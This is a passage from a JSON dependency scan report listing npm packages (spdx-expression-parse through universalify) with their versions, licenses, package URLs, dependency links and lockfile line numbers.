"pkg:npm/spdx-expression-parse@3.0.1", "UID": "9a8d4d050547ef08" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-exceptions@2.5.0", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 10117, "EndLine": 10123 } ], "AnalyzedBy": "yarn" }, { "ID": "spdx-expression-parse@4.0.0", "Name": "spdx-expression-parse", "Identifier": { "PURL": "pkg:npm/spdx-expression-parse@4.0.0", "UID": "657e65fcb4a33c29" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-exceptions@2.5.0", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 10125, "EndLine": 10131 } ], "AnalyzedBy": "yarn" }, { "ID": "spdx-license-ids@3.0.22", "Name": "spdx-license-ids", "Identifier": { "PURL": "pkg:npm/spdx-license-ids@3.0.22", "UID": "d31617146552343b" }, "Version": "3.0.22", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10133, "EndLine": 10136 } ], "AnalyzedBy": "yarn" }, { "ID": "split-on-first@1.1.0", "Name": "split-on-first", "Identifier": { "PURL": "pkg:npm/split-on-first@1.1.0", "UID": "333b046e33ac9f5b" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10138, "EndLine": 10141 } ], "AnalyzedBy": "yarn" }, { "ID": "sprintf-js@1.0.3", "Name": "sprintf-js", "Identifier": { "PURL": "pkg:npm/sprintf-js@1.0.3", "UID": "ffd0f2d4d204035a" }, "Version": "1.0.3", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10143, "EndLine": 10146 } ], "AnalyzedBy": "yarn" }, { "ID": "ssri@12.0.0", "Name": "ssri", "Identifier": { "PURL": "pkg:npm/ssri@12.0.0", "UID": "2f15483b9ea1073f" }, "Version": "12.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 10160, "EndLine": 10163 } ], "AnalyzedBy": "yarn" }, { "ID": "stack-generator@2.0.10", "Name": "stack-generator", "Identifier": { "PURL": "pkg:npm/stack-generator@2.0.10", "UID": "dcce3b7f838f08c0" }, "Version": "2.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stackframe@1.3.4" ], "Locations": [ { "StartLine": 10172, "EndLine": 10177 } ], "AnalyzedBy": "yarn" }, { "ID": "stack-utils@2.0.6", "Name": "stack-utils", "Identifier": { "PURL": "pkg:npm/stack-utils@2.0.6", "UID": "642525afe5322616" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "escape-string-regexp@2.0.0" ], "Locations": [ { "StartLine": 10179, "EndLine": 10184 } ], "AnalyzedBy": "yarn" }, { "ID": "stackframe@1.3.4", "Name": "stackframe", "Identifier": { "PURL": "pkg:npm/stackframe@1.3.4", "UID": "42f543782fa828b0" }, "Version": "1.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10186, "EndLine": 10189 } ], "AnalyzedBy": "yarn" }, { "ID": "stacktrace-gps@3.1.2", "Name": "stacktrace-gps", "Identifier": { "PURL": "pkg:npm/stacktrace-gps@3.1.2", "UID": "62820c8e55691c40" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "source-map@0.5.6", "stackframe@1.3.4" ], "Locations": [ { "StartLine": 10191, "EndLine": 10197 } ], "AnalyzedBy": "yarn" }, { "ID": "stacktrace-js@2.0.2", "Name": "stacktrace-js", "Identifier": { "PURL": "pkg:npm/stacktrace-js@2.0.2", "UID": "88fc73f6d96bfe61" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "error-stack-parser@2.1.4", "stack-generator@2.0.10", "stacktrace-gps@3.1.2" ], "Locations": [ { "StartLine": 10199, "EndLine": 10206 } ], "AnalyzedBy": "yarn" }, { "ID": "stacktrace-parser@0.1.11", "Name": "stacktrace-parser", "Identifier": { "PURL": "pkg:npm/stacktrace-parser@0.1.11", "UID": "ab36b68fcfed33ac" }, "Version": "0.1.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "type-fest@0.7.1" ], "Locations": [ { "StartLine": 10208, "EndLine": 10213 } ], "AnalyzedBy": "yarn" }, { "ID": "statuses@1.5.0", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@1.5.0", "UID": "6e21b7ae267a9cdd" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10215, "EndLine": 10218 } ], "AnalyzedBy": "yarn" }, { "ID": "statuses@2.0.1", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@2.0.1", "UID": "2f5224787c555232" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10220, "EndLine": 10223 } ], "AnalyzedBy": "yarn" }, { "ID": "stream-buffers@2.2.0", "Name": "stream-buffers", "Identifier": { "PURL": "pkg:npm/stream-buffers@2.2.0", "UID": "de45ad1818341e0b" }, "Version": "2.2.0", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10233, "EndLine": 10236 } ], "AnalyzedBy": "yarn" }, { "ID": "streamx@2.23.0", "Name": "streamx", "Identifier": { "PURL": "pkg:npm/streamx@2.23.0", "UID": "b15dc1ecea0594ed" }, "Version": "2.23.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "events-universal@1.0.1", "fast-fifo@1.3.2", "text-decoder@1.2.3" ], "Locations": [ { "StartLine": 10238, "EndLine": 10245 } ], "AnalyzedBy": "yarn" }, { "ID": "strict-uri-encode@2.0.0", "Name": "strict-uri-encode", "Identifier": { "PURL": "pkg:npm/strict-uri-encode@2.0.0", "UID": "d52ff4f00f3a985d" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10247, "EndLine": 10250 } ], "AnalyzedBy": "yarn" }, { "ID": "string-hash-64@1.0.3", "Name": "string-hash-64", "Identifier": { "PURL": "pkg:npm/string-hash-64@1.0.3", "UID": "5f8e2196aa03499b" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10266, "EndLine": 10269 } ], "AnalyzedBy": "yarn" }, { "ID": "string-width@1.0.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@1.0.2", "UID": "d8eb4fae86e95a13" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "code-point-at@1.1.0", "is-fullwidth-code-point@1.0.0", "strip-ansi@3.0.1" ], "Locations": [ { "StartLine": 10293, "EndLine": 10300 } ], "AnalyzedBy": "yarn" }, { "ID": "string-width@4.2.3", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@4.2.3", "UID": "54ff133b6a227ae8" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "emoji-regex@8.0.0", "is-fullwidth-code-point@3.0.0", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 10302, "EndLine": 10309 } ], "AnalyzedBy": "yarn" }, { "ID": "string-width@5.1.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@5.1.2", "UID": "20da29b0c6f35492" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "eastasianwidth@0.2.0", "emoji-regex@9.2.2", "strip-ansi@7.1.2" ], "Locations": [ { "StartLine": 10311, "EndLine": 10318 } ], "AnalyzedBy": "yarn" }, { "ID": "string-width-cjs@4.2.3", "Name": "string-width-cjs", "Identifier": { "PURL": "pkg:npm/string-width-cjs@4.2.3", "UID": "dc7b6a50908b2492" }, "Version": "4.2.3", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "emoji-regex@8.0.0", "is-fullwidth-code-point@3.0.0", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 10284, "EndLine": 10291 } ], "AnalyzedBy": "yarn" }, { "ID": "string_decoder@1.1.1", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.1.1", "UID": "f91a88ce727605d4" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 10259, "EndLine": 10264 } ], "AnalyzedBy": "yarn" }, { "ID": "string_decoder@1.3.0", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.3.0", "UID": "b43521ec42e30c2a" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 10252, "EndLine": 10257 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-ansi@3.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@3.0.1", "UID": "d1fd98a13558fb7c" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@2.1.1" ], "Locations": [ { "StartLine": 10386, "EndLine": 10391 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-ansi@6.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@6.0.1", "UID": "30dca36fd0f046f1" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@5.0.1" ], "Locations": [ { "StartLine": 10400, "EndLine": 10405 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-ansi@7.1.2", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@7.1.2", "UID": "f09dd884e5b22743" }, "Version": "7.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@6.2.2" ], "Locations": [ { "StartLine": 10407, "EndLine": 10412 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-ansi-cjs@6.0.1", "Name": "strip-ansi-cjs", "Identifier": { "PURL": "pkg:npm/strip-ansi-cjs@6.0.1", "UID": "21cd0c839a0d39ef" }, "Version": "6.0.1", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@5.0.1" ], "Locations": [ { "StartLine": 10379, "EndLine": 10384 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-final-newline@2.0.0", "Name": "strip-final-newline", "Identifier": { "PURL": "pkg:npm/strip-final-newline@2.0.0", "UID": "3d024c9581435638" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10419, "EndLine": 10422 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-indent@3.0.0", "Name": "strip-indent", "Identifier": { "PURL": "pkg:npm/strip-indent@3.0.0", "UID": "587c046c4e5b2a8f" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "min-indent@1.0.1" ], "Locations": [ { "StartLine": 10424, "EndLine": 10429 } ], "AnalyzedBy": "yarn" }, { "ID": "strip-json-comments@2.0.1", "Name": "strip-json-comments", "Identifier": { "PURL": "pkg:npm/strip-json-comments@2.0.1", "UID": "9520b7601c8aad3c" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10436, "EndLine": 10439 } ], "AnalyzedBy": "yarn" }, { "ID": "strnum@1.1.2", "Name": "strnum", "Identifier": { "PURL": "pkg:npm/strnum@1.1.2", "UID": "f00a6e720de49321" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10441, "EndLine": 10444 } ], "AnalyzedBy": "yarn" }, { "ID": "supports-color@10.2.2", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@10.2.2", "UID": "40d71a92f8629a8f" }, "Version": "10.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10446, "EndLine": 10449 } ], "AnalyzedBy": "yarn" }, { "ID": "supports-color@5.5.0", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@5.5.0", "UID": "7a0381de409b84e1" }, "Version": "5.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@3.0.0" ], "Locations": [ { "StartLine": 10451, "EndLine": 10456 } ], "AnalyzedBy": "yarn" }, { "ID": "supports-color@7.2.0", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@7.2.0", "UID": "63bca08917b31f70" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@4.0.0" ], "Locations": [ { "StartLine": 10458, "EndLine": 10463 } ], "AnalyzedBy": "yarn" }, { "ID": "supports-color@8.1.1", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@8.1.1", "UID": "eb795688d57d1630" }, "Version": "8.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@4.0.0" ], "Locations": [ { "StartLine": 10465, "EndLine": 10470 } ], "AnalyzedBy": "yarn" }, { "ID": "supports-preserve-symlinks-flag@1.0.0", "Name": "supports-preserve-symlinks-flag", "Identifier": { "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", "UID": "5290a6c0c0afd216" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10472, "EndLine": 10475 } ], "AnalyzedBy": "yarn" }, { "ID": "svg-parser@2.0.4", "Name": "svg-parser", "Identifier": { "PURL": "pkg:npm/svg-parser@2.0.4", "UID": "e63e4aff54c5105d" }, "Version": "2.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10477, "EndLine": 10480 } ], "AnalyzedBy": "yarn" }, { "ID": "svgo@3.3.2", "Name": "svgo", "Identifier": { "PURL": "pkg:npm/svgo@3.3.2", "UID": "80489c325cac7574" }, "Version": "3.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@trysound/sax@0.2.0", "commander@7.2.0", "css-select@5.2.2", "css-tree@2.3.1", "css-what@6.2.2", "csso@5.0.5", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 10482, "EndLine": 10493 } ], "AnalyzedBy": "yarn" }, { "ID": "tar@7.5.1", "Name": "tar", "Identifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "Version": "7.5.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/fs-minipass@4.0.1", "chownr@3.0.0", "minipass@7.1.2", "minizlib@3.1.0", "yallist@5.0.0" ], "Locations": [ { "StartLine": 10548, "EndLine": 10555 } ], "AnalyzedBy": "yarn" }, { "ID": "tar-fs@2.1.4", "Name": "tar-fs", "Identifier": { "PURL": "pkg:npm/tar-fs@2.1.4", "UID": "66b8f9a8dadec602" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "chownr@1.1.4", "mkdirp-classic@0.5.3", "pump@3.0.3", "tar-stream@2.2.0" ], "Locations": [ { "StartLine": 10495, "EndLine": 10503 } ], "AnalyzedBy": "yarn" }, { "ID": "tar-fs@3.1.1", "Name": "tar-fs", "Identifier": { "PURL": "pkg:npm/tar-fs@3.1.1", "UID": "3d30d1855e4877ff" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pump@3.0.3", "tar-stream@3.1.7" ], "Locations": [ { "StartLine": 10505, "EndLine": 10514 } ], "AnalyzedBy": "yarn" }, { "ID": "tar-stream@2.2.0", "Name": "tar-stream", "Identifier": { "PURL": "pkg:npm/tar-stream@2.2.0", "UID": "d05edbad1c0c8fa8" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bl@4.1.0", "end-of-stream@1.4.5", "fs-constants@1.0.0", "inherits@2.0.4", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 10516, "EndLine": 10525 } ], "AnalyzedBy": "yarn" }, { "ID": "tar-stream@3.1.7", "Name": "tar-stream", "Identifier": { "PURL": "pkg:npm/tar-stream@3.1.7", "UID": "94cf543b143475c5" }, "Version": "3.1.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "b4a@1.7.3", "fast-fifo@1.3.2", "streamx@2.23.0" ], "Locations": [ { "StartLine": 10527, "EndLine": 10534 } ], "AnalyzedBy": "yarn" }, { "ID": "terser@5.44.0", "Name": "terser", "Identifier": { "PURL": "pkg:npm/terser@5.44.0", "UID": "e0631b8e81c26b50" }, "Version": "5.44.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/source-map@0.3.11", "acorn@8.15.0", "commander@2.20.3", "source-map-support@0.5.21" ], "Locations": [ { "StartLine": 10557, "EndLine": 10565 } ], "AnalyzedBy": "yarn" }, { "ID": "test-exclude@6.0.0", "Name": "test-exclude", "Identifier": { "PURL": "pkg:npm/test-exclude@6.0.0", "UID": "6c10e1ecb744e2aa" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@istanbuljs/schema@0.1.3", "glob@7.2.3", "minimatch@3.1.2" ], "Locations": [ { "StartLine": 10567, "EndLine": 10574 } ], "AnalyzedBy": "yarn" }, { "ID": "text-decoder@1.2.3", "Name": "text-decoder", "Identifier": { "PURL": "pkg:npm/text-decoder@1.2.3", "UID": "c916b63b2cf935f3" }, "Version": "1.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "b4a@1.7.3" ], "Locations": [ { "StartLine": 10576, "EndLine": 10581 } ], "AnalyzedBy": "yarn" }, { "ID": "text-segmentation@1.0.3", "Name": "text-segmentation", "Identifier": { "PURL": "pkg:npm/text-segmentation@1.0.3", "UID": "c63c06b11e2f6385" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "utrie@1.0.2" ], "Locations": [ { "StartLine": 10583, "EndLine": 10588 } ], "AnalyzedBy": "yarn" }, { "ID": "text-table@0.2.0", "Name": "text-table", "Identifier": { "PURL": "pkg:npm/text-table@0.2.0", "UID": "d1f81fa343a1c681" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10595, "EndLine": 10598 } ], "AnalyzedBy": "yarn" }, { "ID": "throat@5.0.0", "Name": "throat", "Identifier": { "PURL": "pkg:npm/throat@5.0.0", "UID": "86d58e2d47a4a96c" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10600, "EndLine": 10603 } ], "AnalyzedBy": "yarn" }, { "ID": "tiny-queue@0.2.1", "Name": "tiny-queue", "Identifier": { "PURL": "pkg:npm/tiny-queue@0.2.1", "UID": "f148166bae911838" }, "Version": "0.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10605, "EndLine": 10608 } ], "AnalyzedBy": "yarn" }, { "ID": "tiny-relative-date@2.0.2", "Name": "tiny-relative-date", "Identifier": { "PURL": "pkg:npm/tiny-relative-date@2.0.2", "UID": "29fc4694c4728722" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10610, "EndLine": 10613 } ], "AnalyzedBy": "yarn" }, { "ID": "tinyglobby@0.2.15", "Name": "tinyglobby", "Identifier": { "PURL": "pkg:npm/tinyglobby@0.2.15", "UID": "8049df9404b4f119" }, "Version": "0.2.15", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fdir@6.5.0", "picomatch@4.0.3" ], "Locations": [ { "StartLine": 10615, "EndLine": 10621 } ], "AnalyzedBy": "yarn" }, { "ID": "tmpl@1.0.5", "Name": "tmpl", "Identifier": { "PURL": "pkg:npm/tmpl@1.0.5", "UID": "ad55717fb893c578" }, "Version": "1.0.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10628, "EndLine": 10631 } ], "AnalyzedBy": "yarn" }, { "ID": "to-regex-range@5.0.1", "Name": "to-regex-range", "Identifier": { "PURL": "pkg:npm/to-regex-range@5.0.1", "UID": "c7c5dfd7118dbf23" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-number@7.0.0" ], "Locations": [ { "StartLine": 10633, "EndLine": 10638 } ], "AnalyzedBy": "yarn" }, { "ID": "toidentifier@1.0.1", "Name": "toidentifier", "Identifier": { "PURL": "pkg:npm/toidentifier@1.0.1", "UID": "8c5e336c9c86623b" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10640, "EndLine": 10643 } ], "AnalyzedBy": "yarn" }, { "ID": "treeverse@3.0.0", "Name": "treeverse", "Identifier": { "PURL": "pkg:npm/treeverse@3.0.0", "UID": "d61bfeff8f6071be" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10645, "EndLine": 10648 } ], "AnalyzedBy": "yarn" }, { "ID": "trim-newlines@3.0.1", "Name": "trim-newlines", "Identifier": { "PURL": "pkg:npm/trim-newlines@3.0.1", "UID": "b8af9cdc6c5fbe9d" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10650, "EndLine": 10653 } ], "AnalyzedBy": "yarn" }, { "ID": "ts-dedent@2.2.0", "Name": "ts-dedent", "Identifier": { "PURL": "pkg:npm/ts-dedent@2.2.0", "UID": "e495e973875e3dff" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10660, "EndLine": 10663 } ], "AnalyzedBy": "yarn" }, { "ID": "tslib@2.8.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.8.1", "UID": "6e77a6572985ddf9" }, "Version": "2.8.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10675, "EndLine": 10678 } ], "AnalyzedBy": "yarn" }, { "ID": "tuf-js@4.0.0", "Name": "tuf-js", "Identifier": { "PURL": "pkg:npm/tuf-js@4.0.0", "UID": "1199d415ac308be3" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tufjs/models@4.0.0", "debug@4.4.3", "make-fetch-happen@15.0.2" ], "Locations": [ { "StartLine": 10687, "EndLine": 10692 } ], "AnalyzedBy": "yarn" }, { "ID": "tunnel-agent@0.6.0", "Name": "tunnel-agent", "Identifier": { "PURL": "pkg:npm/tunnel-agent@0.6.0", "UID": "ecdeaeaba38f9b3" }, "Version": "0.6.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 10694, "EndLine": 10699 } ], "AnalyzedBy": "yarn" }, { "ID": "type-detect@4.0.8", "Name": "type-detect", "Identifier": { "PURL": "pkg:npm/type-detect@4.0.8", "UID": "1a53754d8ba43838" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10708, "EndLine": 10711 } ], "AnalyzedBy": "yarn" }, { "ID": "type-fest@0.18.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.18.1", "UID": "6fb8203cf3865def" }, "Version": "0.18.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10713, "EndLine": 10716 } ], "AnalyzedBy": "yarn" }, { "ID": "type-fest@0.6.0", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.6.0", "UID": "805e1b649f01aa3f" }, "Version": "0.6.0", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10728, "EndLine": 10731 } ], "AnalyzedBy": "yarn" }, { "ID": "type-fest@0.7.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.7.1", "UID": "f0d90d2103742f1a" }, "Version": "0.7.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10733, "EndLine": 10736 } ], "AnalyzedBy": "yarn" }, { "ID": "type-fest@0.8.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.8.1", "UID": "609758dea023219b" }, "Version": "0.8.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10738, "EndLine": 10741 } ], "AnalyzedBy": "yarn" }, { "ID": "ua-parser-js@0.7.41", "Name": "ua-parser-js", "Identifier": { "PURL": "pkg:npm/ua-parser-js@0.7.41", "UID": "9902e86927b11d9e" }, "Version": "0.7.41", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10801, "EndLine": 10804 } ], "AnalyzedBy": "yarn" }, { "ID": "uc.micro@1.0.6", "Name": "uc.micro", "Identifier": { "PURL": "pkg:npm/uc.micro@1.0.6", "UID": "f3d66c2ef8776946" }, "Version": "1.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10806, "EndLine": 10809 } ], "AnalyzedBy": "yarn" }, { "ID": "undici-types@7.14.0", "Name": "undici-types", "Identifier": { "PURL": "pkg:npm/undici-types@7.14.0", "UID": "8163996ff4da1912" }, "Version": "7.14.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10821, "EndLine": 10824 } ], "AnalyzedBy": "yarn" }, { "ID": "unicode-canonical-property-names-ecmascript@2.0.1", "Name": "unicode-canonical-property-names-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-canonical-property-names-ecmascript@2.0.1", "UID": "389ad2ac5dd5da6e" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10826, "EndLine": 10829 } ], "AnalyzedBy": "yarn" }, { "ID": "unicode-match-property-ecmascript@2.0.0", "Name": "unicode-match-property-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-match-property-ecmascript@2.0.0", "UID": "4975aad3aca0d5b7" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "unicode-canonical-property-names-ecmascript@2.0.1", "unicode-property-aliases-ecmascript@2.2.0" ], "Locations": [ { "StartLine": 10831, "EndLine": 10837 } ], "AnalyzedBy": "yarn" }, { "ID": "unicode-match-property-value-ecmascript@2.2.1", "Name": "unicode-match-property-value-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-match-property-value-ecmascript@2.2.1", "UID": "928a6362ba92eb24" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10839, "EndLine": 10842 } ], "AnalyzedBy": "yarn" }, { "ID": "unicode-property-aliases-ecmascript@2.2.0", "Name": "unicode-property-aliases-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-property-aliases-ecmascript@2.2.0", "UID": "85783527577c74ab" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10844, "EndLine": 10847 } ], "AnalyzedBy": "yarn" }, { "ID": "unique-filename@4.0.0", "Name": "unique-filename", "Identifier": { "PURL": "pkg:npm/unique-filename@4.0.0", "UID": "a2e8baabf6bdcfbc" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "unique-slug@5.0.0" ], "Locations": [ { "StartLine": 10856, "EndLine": 10859 } ], "AnalyzedBy": "yarn" }, { "ID": "unique-slug@5.0.0", "Name": "unique-slug", "Identifier": { "PURL": "pkg:npm/unique-slug@5.0.0", "UID": "da4fd8cfb12b39cb" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4" ], "Locations": [ { "StartLine": 10868, "EndLine": 10871 } ], "AnalyzedBy": "yarn" }, { "ID": "universalify@0.1.2", "Name": "universalify", "Identifier": { "PURL": "pkg:npm/universalify@0.1.2", "UID": "cc2b2ac191984750" }, "Version": "0.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10873, 